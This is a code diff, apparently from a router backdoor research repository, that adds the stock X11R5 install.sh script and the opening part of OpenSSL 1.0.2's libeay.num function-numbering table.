+# install - install a program, script, or datafile
+# This comes from X11R5; it is not part of GNU.
+#
+# $XConsortium: install.sh,v 1.2 89/12/18 14:47:22 jim Exp $
+#
+# This script is compatible with the BSD install script, but was written
+# from scratch.
+#
+
+
+# set DOITPROG to echo to test this script
+
+doit="${DOITPROG:-}"
+
+
+# put in absolute paths if you don't have them in your path; or use env. vars.
+
+mvprog="${MVPROG:-mv}"
+cpprog="${CPPROG:-cp}"
+chmodprog="${CHMODPROG:-chmod}"
+chownprog="${CHOWNPROG:-chown}"
+chgrpprog="${CHGRPPROG:-chgrp}"
+stripprog="${STRIPPROG:-strip}"
+rmprog="${RMPROG:-rm}"
+
+instcmd="$mvprog"
+chmodcmd=""
+chowncmd=""
+chgrpcmd=""
+stripcmd=""
+rmcmd="$rmprog -f"
+src=""
+dst=""
+
+while [ x"$1" != x ]; do
+    case $1 in
+	-c) instcmd="$cpprog"
+	    shift
+	    continue;;
+
+	-m) chmodcmd="$chmodprog $2"
+	    shift
+	    shift
+	    continue;;
+
+	-o) chowncmd="$chownprog $2"
+	    shift
+	    shift
+	    continue;;
+
+	-g) chgrpcmd="$chgrpprog $2"
+	    shift
+	    shift
+	    continue;;
+
+	-s) stripcmd="$stripprog"
+	    shift
+	    continue;;
+
+	*)  if [ x"$src" = x ]
+	    then
+		src=$1
+	    else
+		dst=$1
+	    fi
+	    shift
+	    continue;;
+    esac
+done
+
+if [ x"$src" = x ]
+then
+	echo "install:  no input file specified"
+	exit 1
+fi
+
+if [ x"$dst" = x ]
+then
+	echo "install:  no destination specified"
+	exit 1
+fi
+
+
+# if destination is a directory, append the input filename; if your system
+# does not like double slashes in filenames, you may need to add some logic
+
+if [ -d $dst ]
+then
+	dst="$dst"/`basename $src`
+fi
+
+
+# get rid of the old one and mode the new one in
+
+$doit $rmcmd $dst
+$doit $instcmd $src $dst
+
+
+# and set any options; do chmod last to preserve setuid bits
+
+if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; fi
+if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; fi
+if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; fi
+if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; fi
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/libeay.num b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/libeay.num
new file mode 100755
index 0000000..4a11d78
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/libeay.num
@@ -0,0 +1,4414 @@
+SSLeay                                  1	EXIST::FUNCTION:
+SSLeay_version                          2	EXIST::FUNCTION:
+ASN1_BIT_STRING_asn1_meth               3	NOEXIST::FUNCTION:
+ASN1_HEADER_free                        4	NOEXIST::FUNCTION:
+ASN1_HEADER_new                         5	NOEXIST::FUNCTION:
+ASN1_IA5STRING_asn1_meth                6	NOEXIST::FUNCTION:
+ASN1_INTEGER_get                        7	EXIST::FUNCTION:
+ASN1_INTEGER_set                        8	EXIST::FUNCTION:
+ASN1_INTEGER_to_BN                      9	EXIST::FUNCTION:
+ASN1_OBJECT_create                      10	EXIST::FUNCTION:
+ASN1_OBJECT_free                        11	EXIST::FUNCTION:
+ASN1_OBJECT_new                         12	EXIST::FUNCTION:
+ASN1_PRINTABLE_type                     13	EXIST::FUNCTION:
+ASN1_STRING_cmp                         14	EXIST::FUNCTION:
+ASN1_STRING_dup                         15	EXIST::FUNCTION:
+ASN1_STRING_free                        16	EXIST::FUNCTION:
+ASN1_STRING_new                         17	EXIST::FUNCTION:
+ASN1_STRING_print                       18	EXIST::FUNCTION:BIO
+ASN1_STRING_set                         19	EXIST::FUNCTION:
+ASN1_STRING_type_new                    20	EXIST::FUNCTION:
+ASN1_TYPE_free                          21	EXIST::FUNCTION:
+ASN1_TYPE_new                           22	EXIST::FUNCTION:
+ASN1_UNIVERSALSTRING_to_string          23	EXIST::FUNCTION:
+ASN1_UTCTIME_check                      24	EXIST::FUNCTION:
+ASN1_UTCTIME_print                      25	EXIST::FUNCTION:BIO
+ASN1_UTCTIME_set                        26	EXIST::FUNCTION:
+ASN1_check_infinite_end                 27	EXIST::FUNCTION:
+ASN1_d2i_bio                            28	EXIST::FUNCTION:BIO
+ASN1_d2i_fp                             29	EXIST::FUNCTION:FP_API
+ASN1_digest                             30	EXIST::FUNCTION:EVP
+ASN1_dup                                31	EXIST::FUNCTION:
+ASN1_get_object                         32	EXIST::FUNCTION:
+ASN1_i2d_bio                            33	EXIST::FUNCTION:BIO
+ASN1_i2d_fp                             34	EXIST::FUNCTION:FP_API
+ASN1_object_size                        35	EXIST::FUNCTION:
+ASN1_parse                              36	EXIST::FUNCTION:BIO
+ASN1_put_object                         37	EXIST::FUNCTION:
+ASN1_sign                               38	EXIST::FUNCTION:EVP
+ASN1_verify                             39	EXIST::FUNCTION:EVP
+BF_cbc_encrypt                          40	EXIST::FUNCTION:BF
+BF_cfb64_encrypt                        41	EXIST::FUNCTION:BF
+BF_ecb_encrypt                          42	EXIST::FUNCTION:BF
+BF_encrypt                              43	EXIST::FUNCTION:BF
+BF_ofb64_encrypt                        44	EXIST::FUNCTION:BF
+BF_options                              45	EXIST::FUNCTION:BF
+BF_set_key                              46	EXIST::FUNCTION:BF
+BIO_CONNECT_free                        47	NOEXIST::FUNCTION:
+BIO_CONNECT_new                         48	NOEXIST::FUNCTION:
+BIO_accept                              51	EXIST::FUNCTION:
+BIO_ctrl                                52	EXIST::FUNCTION:
+BIO_int_ctrl                            53	EXIST::FUNCTION:
+BIO_debug_callback                      54	EXIST::FUNCTION:
+BIO_dump                                55	EXIST::FUNCTION:
+BIO_dup_chain                           56	EXIST::FUNCTION:
+BIO_f_base64                            57	EXIST::FUNCTION:BIO
+BIO_f_buffer                            58	EXIST::FUNCTION:
+BIO_f_cipher                            59	EXIST::FUNCTION:BIO
+BIO_f_md                                60	EXIST::FUNCTION:BIO
+BIO_f_null                              61	EXIST::FUNCTION:
+BIO_f_proxy_server                      62	NOEXIST::FUNCTION:
+BIO_fd_non_fatal_error                  63	EXIST::FUNCTION:
+BIO_fd_should_retry                     64	EXIST::FUNCTION:
+BIO_find_type                           65	EXIST::FUNCTION:
+BIO_free                                66	EXIST::FUNCTION:
+BIO_free_all                            67	EXIST::FUNCTION:
+BIO_get_accept_socket                   69	EXIST::FUNCTION:
+BIO_get_filter_bio                      70	NOEXIST::FUNCTION:
+BIO_get_host_ip                         71	EXIST::FUNCTION:
+BIO_get_port                            72	EXIST::FUNCTION:
+BIO_get_retry_BIO                       73	EXIST::FUNCTION:
+BIO_get_retry_reason                    74	EXIST::FUNCTION:
+BIO_gethostbyname                       75	EXIST::FUNCTION:
+BIO_gets                                76	EXIST::FUNCTION:
+BIO_new                                 78	EXIST::FUNCTION:
+BIO_new_accept                          79	EXIST::FUNCTION:
+BIO_new_connect                         80	EXIST::FUNCTION:
+BIO_new_fd                              81	EXIST::FUNCTION:
+BIO_new_file                            82	EXIST::FUNCTION:FP_API
+BIO_new_fp                              83	EXIST::FUNCTION:FP_API
+BIO_new_socket                          84	EXIST::FUNCTION:
+BIO_pop                                 85	EXIST::FUNCTION:
+BIO_printf                              86	EXIST::FUNCTION:
+BIO_push                                87	EXIST::FUNCTION:
+BIO_puts                                88	EXIST::FUNCTION:
+BIO_read                                89	EXIST::FUNCTION:
+BIO_s_accept                            90	EXIST::FUNCTION:
+BIO_s_connect                           91	EXIST::FUNCTION:
+BIO_s_fd                                92	EXIST::FUNCTION:
+BIO_s_file                              93	EXIST::FUNCTION:FP_API
+BIO_s_mem                               95	EXIST::FUNCTION:
+BIO_s_null                              96	EXIST::FUNCTION:
+BIO_s_proxy_client                      97	NOEXIST::FUNCTION:
+BIO_s_socket                            98	EXIST::FUNCTION:
+BIO_set                                 100	EXIST::FUNCTION:
+BIO_set_cipher                          101	EXIST::FUNCTION:BIO
+BIO_set_tcp_ndelay                      102	EXIST::FUNCTION:
+BIO_sock_cleanup                        103	EXIST::FUNCTION:
+BIO_sock_error                          104	EXIST::FUNCTION:
+BIO_sock_init                           105	EXIST::FUNCTION:
+BIO_sock_non_fatal_error                106	EXIST::FUNCTION:
+BIO_sock_should_retry                   107	EXIST::FUNCTION:
+BIO_socket_ioctl                        108	EXIST::FUNCTION:
+BIO_write                               109	EXIST::FUNCTION:
+BN_CTX_free                             110	EXIST::FUNCTION:
+BN_CTX_new                              111	EXIST::FUNCTION:
+BN_MONT_CTX_free                        112	EXIST::FUNCTION:
+BN_MONT_CTX_new                         113	EXIST::FUNCTION:
+BN_MONT_CTX_set                         114	EXIST::FUNCTION:
+BN_add                                  115	EXIST::FUNCTION:
+BN_add_word                             116	EXIST::FUNCTION:
+BN_hex2bn                               117	EXIST::FUNCTION:
+BN_bin2bn                               118	EXIST::FUNCTION:
+BN_bn2hex                               119	EXIST::FUNCTION:
+BN_bn2bin                               120	EXIST::FUNCTION:
+BN_clear                                121	EXIST::FUNCTION:
+BN_clear_bit                            122	EXIST::FUNCTION:
+BN_clear_free                           123	EXIST::FUNCTION:
+BN_cmp                                  124	EXIST::FUNCTION:
+BN_copy                                 125	EXIST::FUNCTION:
+BN_div                                  126	EXIST::FUNCTION:
+BN_div_word                             127	EXIST::FUNCTION:
+BN_dup                                  128	EXIST::FUNCTION:
+BN_free                                 129	EXIST::FUNCTION:
+BN_from_montgomery                      130	EXIST::FUNCTION:
+BN_gcd                                  131	EXIST::FUNCTION:
+BN_generate_prime                       132	EXIST::FUNCTION:DEPRECATED
+BN_get_word                             133	EXIST::FUNCTION:
+BN_is_bit_set                           134	EXIST::FUNCTION:
+BN_is_prime                             135	EXIST::FUNCTION:DEPRECATED
+BN_lshift                               136	EXIST::FUNCTION:
+BN_lshift1                              137	EXIST::FUNCTION:
+BN_mask_bits                            138	EXIST::FUNCTION:
+BN_mod                                  139	NOEXIST::FUNCTION:
+BN_mod_exp                              140	EXIST::FUNCTION:
+BN_mod_exp_mont                         141	EXIST::FUNCTION:
+BN_mod_exp_simple                       143	EXIST::FUNCTION:
+BN_mod_inverse                          144	EXIST::FUNCTION:
+BN_mod_mul                              145	EXIST::FUNCTION:
+BN_mod_mul_montgomery                   146	EXIST::FUNCTION:
+BN_mod_word                             148	EXIST::FUNCTION:
+BN_mul                                  149	EXIST::FUNCTION:
+BN_new                                  150	EXIST::FUNCTION:
+BN_num_bits                             151	EXIST::FUNCTION:
+BN_num_bits_word                        152	EXIST::FUNCTION:
+BN_options                              153	EXIST::FUNCTION:
+BN_print                                154	EXIST::FUNCTION:
+BN_print_fp                             155	EXIST::FUNCTION:FP_API
+BN_rand                                 156	EXIST::FUNCTION:
+BN_reciprocal                           157	EXIST::FUNCTION:
+BN_rshift                               158	EXIST::FUNCTION:
+BN_rshift1                              159	EXIST::FUNCTION:
+BN_set_bit                              160	EXIST::FUNCTION:
+BN_set_word                             161	EXIST::FUNCTION:
+BN_sqr                                  162	EXIST::FUNCTION:
+BN_sub                                  163	EXIST::FUNCTION:
+BN_to_ASN1_INTEGER                      164	EXIST::FUNCTION:
+BN_ucmp                                 165	EXIST::FUNCTION:
+BN_value_one                            166	EXIST::FUNCTION:
+BUF_MEM_free                            167	EXIST::FUNCTION:
+BUF_MEM_grow                            168	EXIST::FUNCTION:
+BUF_MEM_new                             169	EXIST::FUNCTION:
+BUF_strdup                              170	EXIST::FUNCTION:
+CONF_free                               171	EXIST::FUNCTION:
+CONF_get_number                         172	EXIST::FUNCTION:
+CONF_get_section                        173	EXIST::FUNCTION:
+CONF_get_string                         174	EXIST::FUNCTION:
+CONF_load                               175	EXIST::FUNCTION:
+CRYPTO_add_lock                         176	EXIST::FUNCTION:
+CRYPTO_dbg_free                         177	EXIST::FUNCTION:
+CRYPTO_dbg_malloc                       178	EXIST::FUNCTION:
+CRYPTO_dbg_realloc                      179	EXIST::FUNCTION:
+CRYPTO_dbg_remalloc                     180	NOEXIST::FUNCTION:
+CRYPTO_free                             181	EXIST::FUNCTION:
+CRYPTO_get_add_lock_callback            182	EXIST::FUNCTION:
+CRYPTO_get_id_callback                  183	EXIST::FUNCTION:DEPRECATED
+CRYPTO_get_lock_name                    184	EXIST::FUNCTION:
+CRYPTO_get_locking_callback             185	EXIST::FUNCTION:
+CRYPTO_get_mem_functions                186	EXIST::FUNCTION:
+CRYPTO_lock                             187	EXIST::FUNCTION:
+CRYPTO_malloc                           188	EXIST::FUNCTION:
+CRYPTO_mem_ctrl                         189	EXIST::FUNCTION:
+CRYPTO_mem_leaks                        190	EXIST::FUNCTION:
+CRYPTO_mem_leaks_cb                     191	EXIST::FUNCTION:
+CRYPTO_mem_leaks_fp                     192	EXIST::FUNCTION:FP_API
+CRYPTO_realloc                          193	EXIST::FUNCTION:
+CRYPTO_remalloc                         194	EXIST::FUNCTION:
+CRYPTO_set_add_lock_callback            195	EXIST::FUNCTION:
+CRYPTO_set_id_callback                  196	EXIST::FUNCTION:DEPRECATED
+CRYPTO_set_locking_callback             197	EXIST::FUNCTION:
+CRYPTO_set_mem_functions                198	EXIST::FUNCTION:
+CRYPTO_thread_id                        199	EXIST::FUNCTION:DEPRECATED
+DH_check                                200	EXIST::FUNCTION:DH
+DH_compute_key                          201	EXIST::FUNCTION:DH
+DH_free                                 202	EXIST::FUNCTION:DH
+DH_generate_key                         203	EXIST::FUNCTION:DH
+DH_generate_parameters                  204	EXIST::FUNCTION:DEPRECATED,DH
+DH_new                                  205	EXIST::FUNCTION:DH
+DH_size                                 206	EXIST::FUNCTION:DH
+DHparams_print                          207	EXIST::FUNCTION:BIO,DH
+DHparams_print_fp                       208	EXIST::FUNCTION:DH,FP_API
+DSA_free                                209	EXIST::FUNCTION:DSA
+DSA_generate_key                        210	EXIST::FUNCTION:DSA
+DSA_generate_parameters                 211	EXIST::FUNCTION:DEPRECATED,DSA
+DSA_is_prime                            212	NOEXIST::FUNCTION:
+DSA_new                                 213	EXIST::FUNCTION:DSA
+DSA_print                               214	EXIST::FUNCTION:BIO,DSA
+DSA_print_fp                            215	EXIST::FUNCTION:DSA,FP_API
+DSA_sign                                216	EXIST::FUNCTION:DSA
+DSA_sign_setup                          217	EXIST::FUNCTION:DSA
+DSA_size                                218	EXIST::FUNCTION:DSA
+DSA_verify                              219	EXIST::FUNCTION:DSA
+DSAparams_print                         220	EXIST::FUNCTION:BIO,DSA
+DSAparams_print_fp                      221	EXIST::FUNCTION:DSA,FP_API
+ERR_clear_error                         222	EXIST::FUNCTION:
+ERR_error_string                        223	EXIST::FUNCTION:
+ERR_free_strings                        224	EXIST::FUNCTION:
+ERR_func_error_string                   225	EXIST::FUNCTION:
+ERR_get_err_state_table                 226	EXIST::FUNCTION:LHASH
+ERR_get_error                           227	EXIST::FUNCTION:
+ERR_get_error_line                      228	EXIST::FUNCTION:
+ERR_get_state                           229	EXIST::FUNCTION:
+ERR_get_string_table                    230	EXIST::FUNCTION:LHASH
+ERR_lib_error_string                    231	EXIST::FUNCTION:
+ERR_load_ASN1_strings                   232	EXIST::FUNCTION:
+ERR_load_BIO_strings                    233	EXIST::FUNCTION:
+ERR_load_BN_strings                     234	EXIST::FUNCTION:
+ERR_load_BUF_strings                    235	EXIST::FUNCTION:
+ERR_load_CONF_strings                   236	EXIST::FUNCTION:
+ERR_load_DH_strings                     237	EXIST::FUNCTION:DH
+ERR_load_DSA_strings                    238	EXIST::FUNCTION:DSA
+ERR_load_ERR_strings                    239	EXIST::FUNCTION:
+ERR_load_EVP_strings                    240	EXIST::FUNCTION:
+ERR_load_OBJ_strings                    241	EXIST::FUNCTION:
+ERR_load_PEM_strings                    242	EXIST::FUNCTION:
+ERR_load_PROXY_strings                  243	NOEXIST::FUNCTION:
+ERR_load_RSA_strings                    244	EXIST::FUNCTION:RSA
+ERR_load_X509_strings                   245	EXIST::FUNCTION:
+ERR_load_crypto_strings                 246	EXIST::FUNCTION:
+ERR_load_strings                        247	EXIST::FUNCTION:
+ERR_peek_error                          248	EXIST::FUNCTION:
+ERR_peek_error_line                     249	EXIST::FUNCTION:
+ERR_print_errors                        250	EXIST::FUNCTION:BIO
+ERR_print_errors_fp                     251	EXIST::FUNCTION:FP_API
+ERR_put_error                           252	EXIST::FUNCTION:
+ERR_reason_error_string                 253	EXIST::FUNCTION:
+ERR_remove_state                        254	EXIST::FUNCTION:DEPRECATED
+EVP_BytesToKey                          255	EXIST::FUNCTION:
+EVP_CIPHER_CTX_cleanup                  256	EXIST::FUNCTION:
+EVP_CipherFinal                         257	EXIST::FUNCTION:
+EVP_CipherInit                          258	EXIST::FUNCTION:
+EVP_CipherUpdate                        259	EXIST::FUNCTION:
+EVP_DecodeBlock                         260	EXIST::FUNCTION:
+EVP_DecodeFinal                         261	EXIST::FUNCTION:
+EVP_DecodeInit                          262	EXIST::FUNCTION:
+EVP_DecodeUpdate                        263	EXIST::FUNCTION:
+EVP_DecryptFinal                        264	EXIST::FUNCTION:
+EVP_DecryptInit                         265	EXIST::FUNCTION:
+EVP_DecryptUpdate                       266	EXIST::FUNCTION:
+EVP_DigestFinal                         267	EXIST::FUNCTION:
+EVP_DigestInit                          268	EXIST::FUNCTION:
+EVP_DigestUpdate                        269	EXIST::FUNCTION:
+EVP_EncodeBlock                         270	EXIST::FUNCTION:
+EVP_EncodeFinal                         271	EXIST::FUNCTION:
+EVP_EncodeInit                          272	EXIST::FUNCTION:
+EVP_EncodeUpdate                        273	EXIST::FUNCTION:
+EVP_EncryptFinal                        274	EXIST::FUNCTION:
+EVP_EncryptInit                         275	EXIST::FUNCTION:
+EVP_EncryptUpdate                       276	EXIST::FUNCTION:
+EVP_OpenFinal                           277	EXIST::FUNCTION:RSA
+EVP_OpenInit                            278	EXIST::FUNCTION:RSA
+EVP_PKEY_assign                         279	EXIST::FUNCTION:
+EVP_PKEY_copy_parameters                280	EXIST::FUNCTION:
+EVP_PKEY_free                           281	EXIST::FUNCTION:
+EVP_PKEY_missing_parameters             282	EXIST::FUNCTION:
+EVP_PKEY_new                            283	EXIST::FUNCTION:
+EVP_PKEY_save_parameters                284	EXIST::FUNCTION:
+EVP_PKEY_size                           285	EXIST::FUNCTION:
+EVP_PKEY_type                           286	EXIST::FUNCTION:
+EVP_SealFinal                           287	EXIST::FUNCTION:RSA
+EVP_SealInit                            288	EXIST::FUNCTION:RSA
+EVP_SignFinal                           289	EXIST::FUNCTION:
+EVP_VerifyFinal                         290	EXIST::FUNCTION:
+EVP_add_alias                           291	NOEXIST::FUNCTION:
+EVP_add_cipher                          292	EXIST::FUNCTION:
+EVP_add_digest                          293	EXIST::FUNCTION:
+EVP_bf_cbc                              294	EXIST::FUNCTION:BF
+EVP_bf_cfb64                            295	EXIST::FUNCTION:BF
+EVP_bf_ecb                              296	EXIST::FUNCTION:BF
+EVP_bf_ofb                              297	EXIST::FUNCTION:BF
+EVP_cleanup                             298	EXIST::FUNCTION:
+EVP_des_cbc                             299	EXIST::FUNCTION:DES
+EVP_des_cfb64                           300	EXIST::FUNCTION:DES
+EVP_des_ecb                             301	EXIST::FUNCTION:DES
+EVP_des_ede                             302	EXIST::FUNCTION:DES
+EVP_des_ede3                            303	EXIST::FUNCTION:DES
+EVP_des_ede3_cbc                        304	EXIST::FUNCTION:DES
+EVP_des_ede3_cfb64                      305	EXIST::FUNCTION:DES
+EVP_des_ede3_ofb                        306	EXIST::FUNCTION:DES
+EVP_des_ede_cbc                         307	EXIST::FUNCTION:DES
+EVP_des_ede_cfb64                       308	EXIST::FUNCTION:DES
+EVP_des_ede_ofb                         309	EXIST::FUNCTION:DES
+EVP_des_ofb                             310	EXIST::FUNCTION:DES
+EVP_desx_cbc                            311	EXIST::FUNCTION:DES
+EVP_dss                                 312	EXIST::FUNCTION:DSA,SHA
+EVP_dss1                                313	EXIST::FUNCTION:DSA,SHA
+EVP_enc_null                            314	EXIST::FUNCTION:
+EVP_get_cipherbyname                    315	EXIST::FUNCTION:
+EVP_get_digestbyname                    316	EXIST::FUNCTION:
+EVP_get_pw_prompt                       317	EXIST::FUNCTION:
+EVP_idea_cbc                            318	EXIST::FUNCTION:IDEA
+EVP_idea_cfb64                          319	EXIST::FUNCTION:IDEA
+EVP_idea_ecb                            320	EXIST::FUNCTION:IDEA
+EVP_idea_ofb                            321	EXIST::FUNCTION:IDEA
+EVP_md2                                 322	EXIST::FUNCTION:MD2
+EVP_md5                                 323	EXIST::FUNCTION:MD5
+EVP_md_null                             324	EXIST::FUNCTION:
+EVP_rc2_cbc                             325	EXIST::FUNCTION:RC2
+EVP_rc2_cfb64                           326	EXIST::FUNCTION:RC2
+EVP_rc2_ecb                             327	EXIST::FUNCTION:RC2
+EVP_rc2_ofb                             328	EXIST::FUNCTION:RC2
+EVP_rc4                                 329	EXIST::FUNCTION:RC4
+EVP_read_pw_string                      330	EXIST::FUNCTION:
+EVP_set_pw_prompt                       331	EXIST::FUNCTION:
+EVP_sha                                 332	EXIST::FUNCTION:SHA
+EVP_sha1                                333	EXIST::FUNCTION:SHA
+MD2                                     334	EXIST::FUNCTION:MD2
+MD2_Final                               335	EXIST::FUNCTION:MD2
+MD2_Init                                336	EXIST::FUNCTION:MD2
+MD2_Update                              337	EXIST::FUNCTION:MD2
+MD2_options                             338	EXIST::FUNCTION:MD2
+MD5                                     339	EXIST::FUNCTION:MD5
+MD5_Final                               340	EXIST::FUNCTION:MD5
+MD5_Init                                341	EXIST::FUNCTION:MD5
+MD5_Update                              342	EXIST::FUNCTION:MD5
+MDC2                                    343	EXIST::FUNCTION:MDC2
+MDC2_Final                              344	EXIST::FUNCTION:MDC2
+MDC2_Init                               345	EXIST::FUNCTION:MDC2
+MDC2_Update                             346	EXIST::FUNCTION:MDC2
+NETSCAPE_SPKAC_free                     347	EXIST::FUNCTION:
+NETSCAPE_SPKAC_new                      348	EXIST::FUNCTION:
+NETSCAPE_SPKI_free                      349	EXIST::FUNCTION:
+NETSCAPE_SPKI_new                       350	EXIST::FUNCTION:
+NETSCAPE_SPKI_sign                      351	EXIST::FUNCTION:EVP
+NETSCAPE_SPKI_verify                    352	EXIST::FUNCTION:EVP
+OBJ_add_object                          353	EXIST::FUNCTION:
+OBJ_bsearch                             354	NOEXIST::FUNCTION:
+OBJ_cleanup                             355	EXIST::FUNCTION:
+OBJ_cmp                                 356	EXIST::FUNCTION:
+OBJ_create                              357	EXIST::FUNCTION:
+OBJ_dup                                 358	EXIST::FUNCTION:
+OBJ_ln2nid                              359	EXIST::FUNCTION:
+OBJ_new_nid                             360	EXIST::FUNCTION:
+OBJ_nid2ln                              361	EXIST::FUNCTION:
+OBJ_nid2obj                             362	EXIST::FUNCTION:
+OBJ_nid2sn                              363	EXIST::FUNCTION:
+OBJ_obj2nid                             364	EXIST::FUNCTION:
+OBJ_sn2nid                              365	EXIST::FUNCTION:
+OBJ_txt2nid                             366	EXIST::FUNCTION:
+PEM_ASN1_read                           367	EXIST::FUNCTION:
+PEM_ASN1_read_bio                       368	EXIST::FUNCTION:BIO
+PEM_ASN1_write                          369	EXIST::FUNCTION:
+PEM_ASN1_write_bio                      370	EXIST::FUNCTION:BIO
+PEM_SealFinal                           371	EXIST::FUNCTION:RSA
+PEM_SealInit                            372	EXIST::FUNCTION:RSA
+PEM_SealUpdate                          373	EXIST::FUNCTION:RSA
+PEM_SignFinal                           374	EXIST::FUNCTION:
+PEM_SignInit                            375	EXIST::FUNCTION:
+PEM_SignUpdate                          376	EXIST::FUNCTION:
+PEM_X509_INFO_read                      377	EXIST::FUNCTION:
+PEM_X509_INFO_read_bio                  378	EXIST::FUNCTION:BIO
+PEM_X509_INFO_write_bio                 379	EXIST::FUNCTION:BIO
+PEM_dek_info                            380	EXIST::FUNCTION:
+PEM_do_header                           381	EXIST::FUNCTION:
+PEM_get_EVP_CIPHER_INFO                 382	EXIST::FUNCTION:
+PEM_proc_type                           383	EXIST::FUNCTION:
+PEM_read                                384	EXIST::FUNCTION:
+PEM_read_DHparams                       385	EXIST:!WIN16:FUNCTION:DH
+PEM_read_DSAPrivateKey                  386	EXIST:!WIN16:FUNCTION:DSA
+PEM_read_DSAparams                      387	EXIST:!WIN16:FUNCTION:DSA
+PEM_read_PKCS7                          388	EXIST:!WIN16:FUNCTION:
+PEM_read_PrivateKey                     389	EXIST:!WIN16:FUNCTION:
+PEM_read_RSAPrivateKey                  390	EXIST:!WIN16:FUNCTION:RSA
+PEM_read_X509                           391	EXIST:!WIN16:FUNCTION:
+PEM_read_X509_CRL                       392	EXIST:!WIN16:FUNCTION:
+PEM_read_X509_REQ                       393	EXIST:!WIN16:FUNCTION:
+PEM_read_bio                            394	EXIST::FUNCTION:BIO
+PEM_read_bio_DHparams                   395	EXIST::FUNCTION:DH
+PEM_read_bio_DSAPrivateKey              396	EXIST::FUNCTION:DSA
+PEM_read_bio_DSAparams                  397	EXIST::FUNCTION:DSA
+PEM_read_bio_PKCS7                      398	EXIST::FUNCTION:
+PEM_read_bio_PrivateKey                 399	EXIST::FUNCTION:
+PEM_read_bio_RSAPrivateKey              400	EXIST::FUNCTION:RSA
+PEM_read_bio_X509                       401	EXIST::FUNCTION:
+PEM_read_bio_X509_CRL                   402	EXIST::FUNCTION:
+PEM_read_bio_X509_REQ                   403	EXIST::FUNCTION:
+PEM_write                               404	EXIST::FUNCTION:
+PEM_write_DHparams                      405	EXIST:!WIN16:FUNCTION:DH
+PEM_write_DSAPrivateKey                 406	EXIST:!WIN16:FUNCTION:DSA
+PEM_write_DSAparams                     407	EXIST:!WIN16:FUNCTION:DSA
+PEM_write_PKCS7                         408	EXIST:!WIN16:FUNCTION:
+PEM_write_PrivateKey                    409	EXIST:!WIN16:FUNCTION:
+PEM_write_RSAPrivateKey                 410	EXIST:!WIN16:FUNCTION:RSA
+PEM_write_X509                          411	EXIST:!WIN16:FUNCTION:
+PEM_write_X509_CRL                      412	EXIST:!WIN16:FUNCTION:
+PEM_write_X509_REQ                      413	EXIST:!WIN16:FUNCTION:
+PEM_write_bio                           414	EXIST::FUNCTION:BIO
+PEM_write_bio_DHparams                  415	EXIST::FUNCTION:DH
+PEM_write_bio_DSAPrivateKey             416	EXIST::FUNCTION:DSA
+PEM_write_bio_DSAparams                 417	EXIST::FUNCTION:DSA
+PEM_write_bio_PKCS7                     418	EXIST::FUNCTION:
+PEM_write_bio_PrivateKey                419	EXIST::FUNCTION:
+PEM_write_bio_RSAPrivateKey             420	EXIST::FUNCTION:RSA
+PEM_write_bio_X509                      421	EXIST::FUNCTION:
+PEM_write_bio_X509_CRL                  422	EXIST::FUNCTION:
+PEM_write_bio_X509_REQ                  423	EXIST::FUNCTION:
+PKCS7_DIGEST_free                       424	EXIST::FUNCTION:
+PKCS7_DIGEST_new                        425	EXIST::FUNCTION:
+PKCS7_ENCRYPT_free                      426	EXIST::FUNCTION:
+PKCS7_ENCRYPT_new                       427	EXIST::FUNCTION:
+PKCS7_ENC_CONTENT_free                  428	EXIST::FUNCTION:
+PKCS7_ENC_CONTENT_new                   429	EXIST::FUNCTION:
+PKCS7_ENVELOPE_free                     430	EXIST::FUNCTION:
+PKCS7_ENVELOPE_new                      431	EXIST::FUNCTION:
+PKCS7_ISSUER_AND_SERIAL_digest          432	EXIST::FUNCTION:
+PKCS7_ISSUER_AND_SERIAL_free            433	EXIST::FUNCTION:
+PKCS7_ISSUER_AND_SERIAL_new             434	EXIST::FUNCTION:
+PKCS7_RECIP_INFO_free                   435	EXIST::FUNCTION:
+PKCS7_RECIP_INFO_new                    436	EXIST::FUNCTION:
+PKCS7_SIGNED_free                       437	EXIST::FUNCTION:
+PKCS7_SIGNED_new                        438	EXIST::FUNCTION:
+PKCS7_SIGNER_INFO_free                  439	EXIST::FUNCTION:
+PKCS7_SIGNER_INFO_new                   440	EXIST::FUNCTION:
+PKCS7_SIGN_ENVELOPE_free                441	EXIST::FUNCTION:
+PKCS7_SIGN_ENVELOPE_new                 442	EXIST::FUNCTION:
+PKCS7_dup                               443	EXIST::FUNCTION:
+PKCS7_free                              444	EXIST::FUNCTION:
+PKCS7_new                               445	EXIST::FUNCTION:
+PROXY_ENTRY_add_noproxy                 446	NOEXIST::FUNCTION:
+PROXY_ENTRY_clear_noproxy               447	NOEXIST::FUNCTION:
+PROXY_ENTRY_free                        448	NOEXIST::FUNCTION:
+PROXY_ENTRY_get_noproxy                 449	NOEXIST::FUNCTION:
+PROXY_ENTRY_new                         450	NOEXIST::FUNCTION:
+PROXY_ENTRY_set_server                  451	NOEXIST::FUNCTION:
+PROXY_add_noproxy                       452	NOEXIST::FUNCTION:
+PROXY_add_server                        453	NOEXIST::FUNCTION:
+PROXY_check_by_host                     454	NOEXIST::FUNCTION:
+PROXY_check_url                         455	NOEXIST::FUNCTION:
+PROXY_clear_noproxy                     456	NOEXIST::FUNCTION:
+PROXY_free                              457	NOEXIST::FUNCTION:
+PROXY_get_noproxy                       458	NOEXIST::FUNCTION:
+PROXY_get_proxies                       459	NOEXIST::FUNCTION:
+PROXY_get_proxy_entry                   460	NOEXIST::FUNCTION:
+PROXY_load_conf                         461	NOEXIST::FUNCTION:
+PROXY_new                               462	NOEXIST::FUNCTION:
+PROXY_print                             463	NOEXIST::FUNCTION:
+RAND_bytes                              464	EXIST::FUNCTION:
+RAND_cleanup                            465	EXIST::FUNCTION:
+RAND_file_name                          466	EXIST::FUNCTION:
+RAND_load_file                          467	EXIST::FUNCTION:
+RAND_screen                             468	EXIST:WIN32:FUNCTION:
+RAND_seed                               469	EXIST::FUNCTION:
+RAND_write_file                         470	EXIST::FUNCTION:
+RC2_cbc_encrypt                         471	EXIST::FUNCTION:RC2
+RC2_cfb64_encrypt                       472	EXIST::FUNCTION:RC2
+RC2_ecb_encrypt                         473	EXIST::FUNCTION:RC2
